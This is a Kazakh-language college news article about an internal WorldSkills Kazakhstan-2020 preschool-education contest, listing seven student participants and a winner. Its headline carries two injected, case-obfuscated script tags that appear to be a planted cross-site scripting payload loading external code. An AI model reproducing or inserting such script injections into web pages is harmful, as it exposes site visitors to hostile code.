«Мектепке дейінгі тәрбие және оқыту» құзыреттілігі бойынша «WorldSkills Kazakstan-2020» колледжішілік байқауы өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

23.01.2020

2020 жылдың 22 қаңтар күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің мектепке дейінгі бөлімінде «Мектепке дейінгі тәрбие және оқыту» құзыреттілігі бойынша «WorldSkills Kazakstan-2020» аймақтық чемпионатына қатысушыларды іріктеу мақсатында колледжішілік байқауы өткізілді.

Байқауға бөлімнің 2,3 курстарынан 7 студент қатысты:

1. Шуматова Зиля – МД-21тобы.

2. Фазыл Қасиет – МД-21тобы.

3.Тастыбаева Аружан – МД-31тобы.

4. Иват Үмітгүл – МД-31тобы.

5. Сейлжан Тумар – МД-31тобы.

6. Кажкенова Динара – МД-32ҚБ тобы.

7. Аяпбергенова Гүлнұр – МД-32ҚБ тобы.

Чемпионат 4 модуль бойынша өткізілді:

1-модуль. Мектепке дейінгі жастағы балаларды оқыту және тәрбиелеу (Кіріктірілген модуль).

2-модуль. Көркем-эстетикалық даму.

3-модуль. «Денсаулық» білім беру ортасы. 

4-модуль. Сәндік қолданбалы өнер.

Байқауда колледж директоры Нұртас Ахатұлы алғы сөз сөйлеп, қатысушыларға деген лебізін білдірді. Барлық қатысушылар 4 модуль бойынша тыңғылықты дайындықтарымен көзге түсті. Иват Үмітгүл өз шеберлігімен барлық модульде жоғары нәтиже көрсетіп, I орын иегері атанды.

Кәсіби бағдар жұмысын өткізу мақсатында аталған чемпионатқа Көкшетау қаласындағы С.Жүнісов атындағы №18 орта мектебінің 9-10 сынып оқушылары шақырылды. Мектеп оқушыларына колледж ішінде экскурсия ұйымдастырылды.

Просмотров: 1335


Пікір қосу



Деректерді қолтаңбаға қосу